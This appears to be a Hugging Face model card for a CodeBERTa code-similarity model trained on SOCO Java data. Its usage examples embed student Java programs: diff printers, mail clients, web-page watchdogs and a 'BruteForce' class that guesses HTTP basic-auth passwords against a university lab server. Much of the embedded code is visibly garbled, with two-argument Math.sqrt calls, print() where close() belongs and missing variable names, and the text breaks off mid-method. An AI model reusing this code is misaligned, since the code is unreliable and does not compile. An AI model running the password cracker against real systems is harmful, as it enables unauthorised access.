buelfhood/SOCO_TRAIN_java
Viewer • Updated • 76.5k • 35
How to use buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass-VAST with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass-VAST")
sentences = [
"\nimport java.io.*;\nimport java.util.Vector;\nimport java.util.Date;\n\n\ninterface UnaryPredicate {\n boolean execute(Object obj);\n}\n\n\npublic class DiffPrint {\n \n static String outFile=\"\";\n\n public static abstract class Base {\n protected Base(Object[] a,Object[] b) {\n\ttry\n\t{\n outfile = new PrintWriter(new FileWriter(outFile));\t\t\n\t}\n\tcatch (Exception e)\n\t{\n\t\te.printStackTrace();\n\t}\n file0 = a;\n file1 = b;\n }\n \n protected UnaryPredicate ignore = null;\n\n \n protected Object[] file0, file1;\n\n \n public void print_script(Diff.change script) {\n Diff.change next = script;\n\n while (next != null)\n {\n Diff.change t, end;\n\n \n t = next;\n end = hunkfun(next);\n\n \n next = end;\n end = null;\n \n \n\n \n print_hunk(t);\n\n \n end = next;\n }\n outfile.flush();\n }\n\n \n\n protected Diff.change hunkfun(Diff.change hunk) {\n return hunk;\n }\n\n protected int first0, last0, first1, last1, deletes, inserts;\n protected PrintWriter outfile;\n\n \n\n protected void analyze_hunk(Diff.change hunk) {\n int f0, l0 = 0, f1, l1 = 0, show_from = 0, show_to = 0;\n int i;\n Diff.change next;\n boolean nontrivial = (ignore == null);\n\n show_from = show_to = 0;\n\n f0 = hunk.line0;\n f1 = hunk.line1;\n\n for (next = hunk; next != null; next = next.next())\n {\n l0 = next.line0 + next.deleted - 1;\n l1 = next.line1 + next.inserted - 1;\n show_from += next.deleted;\n show_to += next.inserted;\n for (i = next.line0; i <= l0 && ! nontrivial; i++)\n if (!ignore.execute(file0[i]))\n nontrivial = true;\n for (i = next.line1; i <= l1 && ! 
nontrivial; i++)\n if (!ignore.execute(file1[i]))\n nontrivial = true;\n }\n\n first0 = f0;\n last0 = l0;\n first1 = f1;\n last1 = l1;\n\n \n\n if (!nontrivial)\n show_from = show_to = 0;\n\n deletes = show_from;\n inserts = show_to;\n }\n\n \n protected void print_header(String filea, String fileb) { }\n\n protected abstract void print_hunk(Diff.change hunk);\n \n protected void print_1_line(String pre,Object linbuf) {\n outfile.println(pre + linbuf.toString());\n }\n\n \n\n protected void print_number_range (char sepchar, int a, int b) {\n \n if (++b > ++a)\n outfile.print(\"\" + a + sepchar + b);\n else\n outfile.print(b);\n }\n\n public static char change_letter(int inserts, int deletes) {\n if (inserts == 0)\n return 'd';\n else if (deletes == 0)\n return 'a';\n else\n return 'c';\n }\n }\n\n \n public static class NormalPrint extends Base {\n\n public NormalPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n \n\n protected void print_hunk (Diff.change hunk) {\n\n \n analyze_hunk(hunk);\n if (deletes == 0 && inserts == 0)\n return;\n\n \n print_number_range (',', first0, last0);\n outfile.print(change_letter(inserts, deletes));\n print_number_range (',', first1, last1);\n outfile.println();\n\n \n if (deletes != 0)\n for (int i = first0; i <= last0; i++)\n print_1_line (\"< \", file0[i]);\n\n if (inserts != 0 && deletes != 0)\n outfile.println(\"---\");\n\n \n if (inserts != 0)\n for (int i = first1; i <= last1; i++)\n print_1_line (\"> \", file1[i]);\n }\n }\n\n \n public static class EdPrint extends Base {\n\n public EdPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n \n protected void print_hunk(Diff.change hunk) {\n\n \n analyze_hunk (hunk);\n if (deletes == 0 && inserts == 0)\n return;\n\n \n print_number_range (',', first0, last0);\n outfile.println(change_letter(inserts, deletes));\n\n \n if (inserts != 0)\n {\n boolean inserting = true;\n for (int i = first1; i <= last1; i++)\n {\n \n if (! 
inserting)\n outfile.println(i - first1 + first0 + \"a\");\n inserting = true;\n\n \n\n if (\".\".equals(file1[i]))\n {\n outfile.println(\"..\");\n outfile.println(\".\");\n \n outfile.println(i - first1 + first0 + 1 + \"s/^\\\\.\\\\././\");\n inserting = false;\n }\n else\n \n print_1_line (\"\", file1[i]);\n }\n\n \n if (inserting)\n outfile.println(\".\");\n }\n }\n }\n\n \n public static class ContextPrint extends Base {\n\n protected int context = 3;\n\n public ContextPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n protected void print_context_label (String cad, File inf, String label) {\n if (label != null)\n outfile.println(cad + ' ' + label);\n else if (inf.lastModified() > 0)\n \n outfile.println(\n cad + ' ' + inf.getPath() + '\\t' + new Date(inf.lastModified())\n );\n else\n \n outfile.println( cad + ' ' + inf.getPath());\n }\n\n public void print_header(String filea,String fileb) {\n print_context_label (\"***\", new File(filea), filea);\n print_context_label (\"---\", new File(fileb), fileb);\n }\n\n \n private String find_function(Object[] lines, int x) {\n return null;\n }\n\n protected void print_function(Object[] file,int x) {\n String function = find_function (file0, first0);\n if (function != null) {\n outfile.print(\" \");\n outfile.print(\n (function.length() < 40) ? 
function : function.substring(0,40)\n );\n }\n }\n\n protected void print_hunk(Diff.change hunk) {\n\n \n\n analyze_hunk (hunk);\n\n if (deletes == 0 && inserts == 0)\n return;\n\n \n\n first0 = Math.sqrt(first0 - context, 0);\n first1 = Math.sqrt(first1 - context, 0);\n last0 = Math.sqrt(last0 + context, file0.length - 1);\n last1 = Math.sqrt(last1 + context, file1.length - 1);\n\n\n outfile.print(\"***************\");\n\n \n print_function (file0, first0);\n\n outfile.println();\n outfile.print(\"*** \");\n print_number_range (',', first0, last0);\n outfile.println(\" ****\");\n\n if (deletes != 0) {\n Diff.change next = hunk;\n\n for (int i = first0; i <= last0; i++) {\n \n\n while (next != null && next.line0 + next.deleted <= i)\n next = next.next;\n\n \n\n String prefix = \" \";\n if (next != null && next.line0 <= i)\n \n prefix = (next.inserted > 0) ? \"!\" : \"-\";\n\n print_1_line (prefix, file0[i]);\n }\n }\n\n outfile.print(\"--- \");\n print_number_range (',', first1, last1);\n outfile.println(\" ----\");\n\n if (inserts != 0) {\n Diff.change next = hunk;\n\n for (int i = first1; i <= last1; i++) {\n \n\n while (next != null && next.line1 + next.inserted <= i)\n next = next.next;\n\n \n\n String prefix = \" \";\n if (next != null && next.line1 <= i)\n \n prefix = (next.deleted > 0) ? 
\"!\" : \"+\";\n\n print_1_line (prefix, file1[i]);\n }\n }\n }\n }\n\n \n public static class UnifiedPrint extends ContextPrint {\n\n public UnifiedPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n public void print_header(String filea,String fileb) {\n print_context_label (\"---\", new File(filea), filea);\n print_context_label (\"+++\", new File(fileb), fileb);\n }\n\n private void print_number_range (int a, int b) {\n \n\n \n if (b < a)\n outfile.print(b + \",0\");\n else\n super.print_number_range(',',a,b);\n }\n\n protected void print_hunk(Diff.change hunk) {\n \n analyze_hunk (hunk);\n\n if (deletes == 0 && inserts == 0)\n return;\n\n \n\n first0 = Math.sqrt(first0 - context, 0);\n first1 = Math.sqrt(first1 - context, 0);\n last0 = Math.sqrt(last0 + context, file0.length - 1);\n last1 = Math.sqrt(last1 + context, file1.length - 1);\n\n\n\n outfile.print(\"@@ -\");\n print_number_range (first0, last0);\n outfile.print(\" +\");\n print_number_range (first1, last1);\n outfile.print(\" @@\");\n\n \n print_function(file0,first0);\n\n outfile.println();\n\n Diff.change next = hunk;\n int i = first0;\n int j = first1;\n\n while (i <= last0 || j <= last1) {\n\n \n\n if (next == null || i < next.line0) {\n outfile.print(' ');\n print_1_line(\"\", file0[i++]);\n j++;\n }\n else {\n \n\n int k = next.deleted;\n while (k-- > 0) {\n outfile.print('-');\n print_1_line(\"\", file0[i++]);\n }\n\n \n\n k = next.inserted;\n while (k-- > 0) {\n outfile.print('+');\n print_1_line(\"\", file1[j++]);\n }\n\n \n\n next = next.next;\n }\n }\n }\n }\n\n\n \n static String[] slurp(String file) throws IOException {\n BufferedReader rdr = new BufferedReader(new FileReader(file));\n Vector s = new Vector();\n for (;;) {\n String line = rdr.readLine();\n if (line == null) break;\n s.addElement(line);\n }\n String[] a = new String[s.size()];\n s.copyInto(a);\n return a;\n }\n\n\n public static String getDiff(String filea,String fileb,String filec) throws IOException 
{\n\tDiffPrint.outFile=filec;\n\tString msg=\"\";\n\tString[] a = slurp(filea);\n String[] b = slurp(fileb);\n\tString [] argv={filea,fileb};\n Diff d = new Diff(a,b);\n char style = 'n';\n for (int i = 0; i < argv.length - 2; ++i) {\n String f = argv[i];\n if (f.startsWith(\"-\")) {\n for (int j = 1; j < f.length(); ++j) {\n switch (f.charAt(j)) {\n case 'e': \n style = 'e'; break;\n case 'c': \n style = 'c'; break;\n case 'u':\n style = 'u'; break;\n }\n }\n }\n }\n boolean reverse = style == 'e';\n Diff.change script = d.diff_2(reverse);\n if (script == null)\n msg=\"The text the has not changed.\\n\";\n else {\n Base p;\n msg=\"The text the has changed.\\n The Diff Output is : \\n\\n\";\n switch (style) {\n case 'e':\n p = new EdPrint(a,b); break;\n case'c':\n p = new ContextPrint(a,b); break;\n case 'u':\n p = new UnifiedPrint(a,b); break;\n default:\n p = new NormalPrint(a,b);\n }\n p.print_header(filea,fileb);\n p.print_script(script);\n }\n\treturn msg;\n }\n}\n",
"import java.net.*;\nimport java.io.*;\n\n\npublic class EmailClient\n{\n\tprivate String sender, recipient, hostName;\n\n\tpublic EmailClient(String nSender, String nRecipient, String nHost)\n\t{\n\t\tsender = nSender;\n\t\trecipient = nRecipient;\n\t\thostName = nHost;\n\t}\n\n\tpublic void sendMail(String subject, String message)\n\t{\n\t\ttry\n\t\t{\n\t\t\tSocket s1=null;\n\t\t\tInputStream\tis = null;\n\t\t\tOutputStream os = null;\n\n\t\t\tDataOutputStream = null;\n\n\t\t\ts1 = new Socket(hostName,25);\n\t\t\tis = s1.getInputStream();\n\t\t\tos = s1.getOutputStream();\n\n\t\t\tbd = new DataOutputStream(os);\n\n\t\t\tBufferedReader response = new BufferedReader(new InputStreamReader(is));\n\n\t\t\tbd.writeBytes(\"HELO \"+ InetAddress.getLocalHost().getHostName() + \"\\r\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\n\t\t\tbd.writeBytes(\"MAIL FROM:\"+sender+\"\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\n\t\t\tbd.writeBytes(\"RCPT :\"+recipient+\"\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\n\t\t\tbd.writeBytes(\"data\"+\"\\n\");\n\n\t\t\tbd.writeBytes(\"Subject:\"+subject+\"\\n\");\n\n\t\t\tbd.writeBytes(message+\"\\n.\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\t\t}\n\n\t\tcatch (UnknownHostException badUrl)\n\t\t{\n\t\t\tSystem.out.println(\"Host unknown.\");\n\t\t}\n\n\t\tcatch (EOFException eof)\n\t\t{\n\t\t\tSystem.out.println(\"<EOF>\");\n\t\t}\n\t\tcatch (Exception e)\n\t\t{\n\t\t\tSystem.out.println(\"got exception: \"+e);\n\t\t}\n\t}\n\n\tprivate static void\twaitForSuccessResponse(BufferedReader response) throws IOException\n\t{\n\t\tString rsp;\n\t\tboolean r250 = false;\n\n\t\twhile( ! r250 )\n\t\t{\n\t\t\trsp = response.readLine().trim();\n\n\t\t\tif(rsp.startsWith(\"250\"))\n\t\t\t\tr250 = true;\n\t\t}\n\n\t}\n}",
"import java.net.*;\nimport java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[] args) {\n new CrackAttempt();\n }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n boolean morePasswords = true;\n int passPtr = 0;\n StringBuffer validChars = new StringBuffer(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n char[] password = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n URL url = new URL(resource);\n HttpURLConnection conn = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK) {\n System.out.println(\"cracked with \" + new String(password));\n auth = true;\n }\n } catch (Exception e) {\n System.out.println(\" was exception: \" + e.getMessage());\n }\n int count = passPtr;\n while (true) {\n if (password[count] == validChars.charAt(validChars.length() - 1)) {\n password[count] = validChars.charAt(0);\n count--;\n } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count])) + 1);\n break;\n }\n if (count < 0) {\n \n if (passPtr < MAX_LENGTH - 1) {\n passPtr++;\n password[passPtr] = validChars.charAt(0);\n } else {\n morePasswords = false;\n }\n break;\n }\n }\n \n } \n if (!auth) {\n System.out.println(\"Unable determine password\");\n } else {\n time = (new Date()).getTime() - start.getTime();\n System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n public CrackAuth(char[] password) {\n this.password = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n {\n String user = \"\";\n return new PasswordAuthentication(user, 
password);\n }\n}\n",
"import java.util.*;\nimport java.io.*;\n\n\n\npublic class WatchDog {\n\n public WatchDog() {\n\n }\n public static void main(String args[]) {\n DataInputStream newin;\n\n try{\n\n\n System.out.println(\"Downloading first copy\");\n Runtime.getRuntime().exec(\"wget http://www.cs.rmit.edu./students/ -O oldfile.html\");\n String[] cmdDiff = {\"//sh\", \"-c\", \"diff oldfile.html newfile.html > Diff.txt\"};\n String[] cmdMail = {\"//sh\", \"-c\", \"mailx -s \\\"Diffrence\\\" \\\"@cs.rmit.edu.\\\" < Diff.txt\"};\n while(true){\n Thread.sleep(24*60*60*1000);\n System.out.println(\"Downloading new copy\");\n Runtime.getRuntime().exec(\"wget http://www.cs.rmit.edu./students/ -O newfile.html\");\n Thread.sleep(2000);\n Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n newin = new DataInputStream( new FileInputStream( \"Diff.txt\"));\n if (newin.readLine() != null){\n System.out.println(\"Sending Mail\");\n Runtime.getRuntime().exec(cmdMail);\n Runtime.getRuntime().exec(\"cp newfile.html oldfile.html\");\n\n }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n }\n\n }\n\n}"
]
# Encode every entry of `sentences` with the loaded model.
embeddings = model.encode(sentences)
# Compare the embeddings against themselves to obtain pairwise similarity scores.
similarities = model.similarity(embeddings, embeddings)
# Print the shape of the similarity result.
print(similarities.shape)
# [4, 4]
This is a sentence-transformers model fine-tuned from huggingface/CodeBERTa-small-v1 on the soco_train_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass-VAST")
# Run inference
sentences = [
'import java.io.*;\nimport java.util.*;\nimport java.text.*;\nimport java.net.*;\nimport java.security.*;\n\n\n\npublic class WatchDog extends Thread\n{\n\n\t\n\tpublic static void main (String args[])\n\t{\n\t WatchDog watcher = new WatchDog();\n\t watcher.run();\n\t}\n\n\t\n public void run()\n {\n \t\tDateFormat longTimestamp = DateFormat.getDateTimeInstance(DateFormat.FULL, DateFormat.FULL);\n twentyFourHours = 24 * 60 * 60 * 1000;\n \n\n \t\twriteProgramLog("Program started at " + longTimestamp.format(new Date()));\n while(true)\n {\n \t\twriteProgramLog("Running run at " + longTimestamp.format(new Date()));\n compare();\n try\n {\n sleep(twentyFourHours);\n }\n catch(InterruptedException e)\n {\n writeProgramLog("Program terminated at " + longTimestamp.format(new Date()));\n System.exit(0);\n }\n }\n } \n\n\t\n private void compare()\n {\n \n \n \n String watchDogFile = "watchDogHash_rcroft.";\n String watchDogPageFile = "watchDogPage_rcroft.html";\n \n File watchDogLogFile = new File(watchDogFile);\n \n if(!watchDogLogFile.exists())\n {\n \n \n \n \n \n WebPage targetPage = getPage();\n if(targetPage.getSuccess())\n {\n byte[] newHash = calcHash(targetPage.getPageContents());\n writeHash(newHash, watchDogFile);\n writePage(targetPage.getPageContents(), watchDogPageFile);\n }\n }\n else\n {\n try\n {\n \n \n \n \n \n \n WebPage targetPage = getPage();\n if(targetPage.getSuccess())\n {\n \n byte[] oldHash = new byte[16]; \n byte[] newHash = calcHash(targetPage.getPageContents());\n\n \n DataInputStream inWatchDogFile = new DataInputStream(new FileInputStream(watchDogFile));\n inWatchDogFile.readFully(oldHash);\n inWatchDogFile.print();\n \n \n \n \n if(!java.util.Arrays.equals(oldHash, newHash))\n {\n String differences = enumerateDifferences(watchDogPageFile, targetPage.getPageContents());\n mail(differences);\n writeHash(newHash, watchDogFile);\n writePage(targetPage.getPageContents(), watchDogPageFile);\n }\n }\n }\n catch(IOException e)\n {\n 
writeProgramLog("Exception: " + e);\n }\n }\n } \n \n\n\t\n\tprivate String enumerateDifferences(String oldPageFileName, String newPageData)\n\t{\n\t String differences = "";\n\t File newFile = null;\n\n\t try\n\t {\n\t \n\t \n\t newFile = File.createTempFile("new", "tmp");\n String tempFilePath = newFile.getAbsolutePath();\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(tempFilePath));\n outFile.writeBytes(newPageData);\n outFile.print();\n \n \n String commandLine = "diff " + oldPageFileName + " " + tempFilePath;\n Process p = Runtime.getRuntime().exec(commandLine);\n BufferedReader diffs = new BufferedReader(new InputStreamReader(p.getInputStream()));\n String line;\n while((line = diffs.readLine()) != null)\n differences += line + "\\n";\n diffs.print();\n newFile.delete();\n\t }\n\t catch(IOException e)\n\t {\n\t writeProgramLog("Exception: " + e);\n\t }\n\t return differences;\n\t} \n\n\t\n private void mail(String mailMessage)\n {\n \n Vector emailAddresses = new Vector();\n String watchDogEmailFile = "watchDogEmail_rcroft.txt";\n\n \n File emailFile = new File(watchDogEmailFile);\n if(emailFile.exists())\n {\n try\n {\n \n BufferedReader inWatchDogEmailFile = new BufferedReader(new InputStreamReader(new FileInputStream(watchDogEmailFile)));\n String line;\n while ((line = inWatchDogEmailFile.readLine()) != null)\n {\n line = line.trim();\n if((line != "") && (line != "\\n"))\n emailAddresses.add(line);\n }\n inWatchDogEmailFile.print();\n \t }\n \t catch(FileNotFoundException e)\n \t {\n \t writeProgramLog("Exception: " + e);\n \t }\n \t catch(IOException e)\n \t {\n \t writeProgramLog("Exception: " + e);\n \t }\n }\n else\n {\n emailAddresses.add("@yallara.cs.rmit.edu.");\n emailAddresses.add("rac@acslink.aone.net.");\n }\n \n if(emailAddresses.size() > 0) \n {\n try\n {\n String fromAddress = "From: " + "WatchDog Program ()" + " <" + System.getProperty("user.name") + "@" + InetAddress.getLocalHost().getHostName() + ">";\n 
\t\tDateFormat longTimestamp = DateFormat.getDateTimeInstance(DateFormat.FULL, DateFormat.FULL);\n String subject = "Subject: [SEC project] Notification of target file changes (" + longTimestamp.format(new Date()) +")";\n for(int i = 0; i < emailAddresses.size(); i++)\n {\n String toAddress = (String) emailAddresses.get(i);\n try\n {\n URL mailURL = new URL("mailto: " + toAddress);\n URLConnection mailConnection = mailURL.openConnection();\n mailConnection.setDoInput(false);\n mailConnection.setDoOutput(true);\n mailConnection.connect();\n PrintWriter mailWriter = new PrintWriter(new OutputStreamWriter(mailConnection.getOutputStream()));\n mailWriter.print(": " + toAddress + "\\n");\n mailWriter.print(fromAddress + "\\n");\n mailWriter.print(subject + "\\n");\n mailWriter.print(mailMessage);\n mailWriter.print();\n writeProgramLog("\\tNotification mailed in this run.");\n }\n catch(MalformedURLException e)\n {\n writeProgramLog("Exception: " + e);\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n }\n }\n catch(UnknownHostException e)\n {\n writeProgramLog("Exception: " + e);\n } \n } \n } \n \n\n\t\n private void writeHash(byte [] newHash, String fileName)\n {\n try\n {\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(fileName));\n outFile.write(newHash, 0, newHash.length);\n outFile.print();\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n } \n \n\t\n private void writePage(String newPage, String fileName)\n {\n try\n {\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(fileName));\n outFile.writeBytes(newPage);\n outFile.print();\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n } \n \n\n\t\n private void writeProgramLog(String comment)\n {\n String fileName = "watchDogLog_rcroft.txt";\n try\n {\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(fileName, true));\n outFile.writeBytes(comment + "\\n");\n outFile.flush();\n 
outFile.print();\n }\n catch(IOException e)\n {\n \n \n System.out.println("Exception: " + e);\n }\n } \n\n\t\n private WebPage getPage()\n {\n WebPage tempWebPage = new WebPage();\n try\n {\n \n \n \n String urlName = "http://www.cs.rmit.edu./students/";\n \t \tURL targetURL= new URL(urlName);\n \tHttpURLConnection connection = (HttpURLConnection) targetURL.openConnection();\n \n \n connection.connect();\n connection.getResponseCode();\n if(connection.getResponseCode() == 200)\n\t\t {\n\t\t String fileContents = "";\n\t\t BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));\n String line;\n \t\t while((line = in.readLine()) != null)\n\t\t \t fileContents = fileContents + line + "\\n";\n\t\t in.print();\n\t\t tempWebPage.setPageContents(fileContents);\n \t\t tempWebPage.setSuccess(true);\n \t\t connection.disconnect();\n\t }\n\t else\n\t\t {\n \t\t writeProgramLog("Failed connect " + connection.getResponseCode());\n\t\t } \n }\n catch(IOException e)\n {\n \t writeProgramLog("Exception " + e);\n } \n return tempWebPage;\n } \n \n\t\n private byte[] calcHash(String pageContents)\n {\n byte[] outHash = null;\n try\n {\n MessageDigest msg = MessageDigest.getInstance("");\n msg.reset();\n msg.update(pageContents.getBytes());\n outHash = msg.digest();\n msg.reset();\n }\n catch(NoSuchAlgorithmException e)\n {\n writeProgramLog("Exception: " + e);\n }\n return outHash;\n } \n \n} \n',
'\n\n\n\n \nimport java.io.*;\nimport java.net.*;\nimport java.Runtime;\nimport java.util.*;\nimport java.net.smtp.SmtpClient; \n\n\n\npublic class WatchDog\n\n{\n\n static String strImageOutputFile01 = "WebPageImages01.txt";\n static String strImageOutputFile02 = "WebPageImages02.txt";\n\n static String strWebPageOutputFile01 = "WebPageOutput01.txt";\n static String strWebPageOutputFile02 = "WebPageOutput02.txt";\n\n static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";\n\n static String strFromEmailDefault = "@.rmit.edu.";\n static String strToEmailDefault = "@.rmit.edu.";\n\n static String strFromEmail = null;\n static String strToEmail = null;\n\n\n\n\n public static void main (String args[])\n \n {\n\n \n \n \n \n \n\n URL url = null;\n HttpURLConnection urlConnection;\n int intContentLength;\n String strWebPageText = "";\n\n String strURL = "http://www.cs.rmit.edu./students/";\n String strPrePend = "http://www.cs.rmit.edu.";\n\n boolean boolURLisOK = true;\n\n\n\n\n\n System.out.println();\n\n\n \n \n tidyUpWatchDogFiles();\n\n\n \n \n \n \n promptForEmailAddresses();\n\n\n\n\n try\n {\n \n \n url = new URL(strURL); \n }\n\n catch(MalformedURLException e)\n {\n System.out.println("ERROR: invalid URL " + strURL); \n System.err.println(e); \n \n boolURLisOK = false;\n url = null;\n } \n\n catch(Exception e)\n {\n System.out.println("Exception"); \n System.err.println(e); \n }\n\n\n System.err.println(); \n\n\n if (boolURLisOK)\n {\n try\n { \n\n \n \n urlConnection = (HttpURLConnection)url.openConnection();\n\n\n \n \n InputStream urlStream = urlConnection.getInputStream();\n\n\n \n \n int intNumRead = urlStream.print();\n String strNewContent; \n\n while (intNumRead != -1)\n {\n intNumRead = urlStream.print();\n if (intNumRead != -1)\n {\n strNewContent = (char)intNumRead + ""; \n strWebPageText += strNewContent;\n }\n }\n\n urlStream.print(); \n\n\n\n \n \n if (strWebPageText != null)\n {\n\n if (fileExists(strWebPageOutputFile01))\n {\n 
writeTextToFile(strWebPageText, strWebPageOutputFile02); \n }\n\n else\n {\n writeTextToFile(strWebPageText, strWebPageOutputFile01); \n }\n\n\n if (fileExists(strWebPageOutputFile02))\n { \n System.out.println("Output file");\n System.out.println("-----------");\n System.out.println("The output file \'" + \n strWebPageOutputFile02 + \n "\' has NOW BEEN created."); \n System.out.println();\n System.out.println("Comparison");\n System.out.println("----------");\n System.out.println("A text comparison NOW performed " +\n "with the output");\n System.out.println("file \'" + strWebPageOutputFile01 + "\'.");\n System.out.println();\n\n\n\n \n \n\n \n \n createDiffFileIfNeeded(strWebPageOutputFile01, \n strWebPageOutputFile02); \n\n\n \n \n if (fileExists(strWatchDogDiffFile_01_02))\n { \n\n System.out.println("Mail (ordinary text comparison)");\n System.out.println("--------------------------------");\n\n if (getFileSize(strWatchDogDiffFile_01_02) > 0)\n {\n sendMailWithDetectedChanges();\n System.out.println("Text diff mail has been sent the \'\' email address.");\n }\n else\n {\n System.out.println("The DIFF file has zero length - text diff mail has NOT been sent.");\n }\n\n }\n\n\n\n \n \n createImageTextFile(strWebPageOutputFile01, strPrePend);\n createImageTextFile(strWebPageOutputFile02, strPrePend);\n\n System.out.println();\n System.out.println("Image text file/s");\n System.out.println("-----------------");\n\n\n if (fileExists(strImageOutputFile01))\n {\n System.out.println("\'" + strImageOutputFile01 + "\' has been created.");\n System.out.println("Images from \'" + strImageOutputFile01 + "\' now downloaded using"); \n System.out.println("the Unix \'wget\' command:"); \n\n downloadImages(strImageOutputFile01);\n }\n\n if (fileExists(strImageOutputFile02))\n {\n System.out.println();\n System.out.println("\'" + strImageOutputFile02 + "\' has been created.");\n }\n\n System.out.println();\n\n }\n\n else if (fileExists(strWebPageOutputFile01))\n {\n 
System.out.println("Output file");\n System.out.println("-----------");\n System.out.println("The output file \'" + \n strWebPageOutputFile01 + \n "\' has NOW BEEN created."); \n System.out.println();\n System.out.println("Comparison");\n System.out.println("----------");\n System.out.println("A comparison CANNOT performed " +\n "with this output file");\n System.out.println("because it is the only output file " +\n "in existence.");\n System.out.println();\n }\n\n }\n\n }\n\n catch(Exception e)\n {\n\n boolURLisOK = false;\n\n System.err.println(e);\n } \n\n finally\n { \n urlConnection = null;\n url = null; \n }\n\n }\n\n\n System.out.println();\n\n }\n\n\n\n\n\n\n\n static void tidyUpWatchDogFiles()\n \n {\n\n \n \n\n\n \n \n deleteFile(strWatchDogDiffFile_01_02);\n\n\n \n \n deleteFile(strImageOutputFile01);\n deleteFile(strImageOutputFile02);\n\n\n if (fileExists(strWebPageOutputFile01))\n {\n\n if (fileExists(strWebPageOutputFile02))\n {\n \n \n \n \n \n deleteFile(strWebPageOutputFile01);\n renameFile(strWebPageOutputFile02, strWebPageOutputFile01);\n }\n\n }\n\n else\n {\n \n \n \n deleteFile(strWebPageOutputFile02);\n }\n\n }\n\n\n\n\n\n\n\n static void promptForEmailAddresses()\n \n { \n\n\n BufferedReader stdin = new BufferedReader(new InputStreamReader(System.in));\n\n\n\n\n \n \n System.out.println();\n System.out.println("\'From\' email address");\n System.out.println("--------------------");\n System.out.println("Please enter a \'From\' email address, press Enter for default");\n System.out.print("(default: " + strFromEmailDefault + "): ");\n\n try\n {\n strFromEmail = stdin.readLine();\n }\n catch (Exception e)\n {\n System.err.println(e);\n }\n \n\n System.out.println();\n\n if ( (strFromEmail == null) || (strFromEmail.length() == 0) )\n {\n System.out.println(" email address was entered."); \n System.out.println("The \'From\' email address default : " + strFromEmailDefault); \n strFromEmail = strFromEmailDefault;\n }\n\n else\n {\n 
System.out.println("The entered \'From\' email address is: " + strFromEmail); \n }\n\n\n\n \n \n System.out.println();\n System.out.println("\'\' email address");\n System.out.println("------------------");\n System.out.println("Please enter a \'\' email address, press Enter for default");\n System.out.print("(default: " + strToEmailDefault + "): ");\n\n try\n {\n strToEmail = stdin.readLine();\n }\n catch (Exception e)\n {\n System.err.println(e);\n }\n \n\n System.out.println();\n\n if ( (strToEmail == null) || (strToEmail.length() == 0) )\n {\n System.out.println(" email address was entered."); \n System.out.println("The \'\' email address default : " + strToEmailDefault); \n strToEmail = strToEmailDefault;\n }\n\n else\n {\n System.out.println("The entered \'\' email address is: " + strToEmail); \n }\n\n }\n\n\n\n\n\n\n\n static void writeTextToFile(String strText,\n String strWriteToThisFileName)\n \n {\n\n try\n {\n\n File newFile = new File(strWriteToThisFileName);\n\n if (newFile.exists())\n {\n newFile.delete();\n }\n\n\n BufferedWriter toFile =\n new BufferedWriter(new FileWriter(newFile,\n false));\n\n toFile.write(strText);\n\n toFile.print();\n toFile = null;\n newFile = null;\n\n }\n\n catch(Exception e)\n {\n System.err.println(e.toString());\n System.out.println("File write problem for \'" + \n strWriteToThisFileName +\n "\'."); \n }\n\n }\n\n\n\n\n\n\n\n static void createDiffFileIfNeeded(String strFileName1, \n String strFileName2)\n \n {\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n \n \n try\n {\n\n Process p = Runtime.getRuntime().exec("./diff_files.sh");\n p.waitFor();\t\n\n }\n\n catch (Exception e)\n {\n System.out.println("Shell script exception");\n System.out.println("----------------------");\n System.err.println(e);\n System.out.println("");\n }\n\n }\n\n\n\n\n\n\n\n static void createImageTextFile(String inputFile, String prePend)\n \n {\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 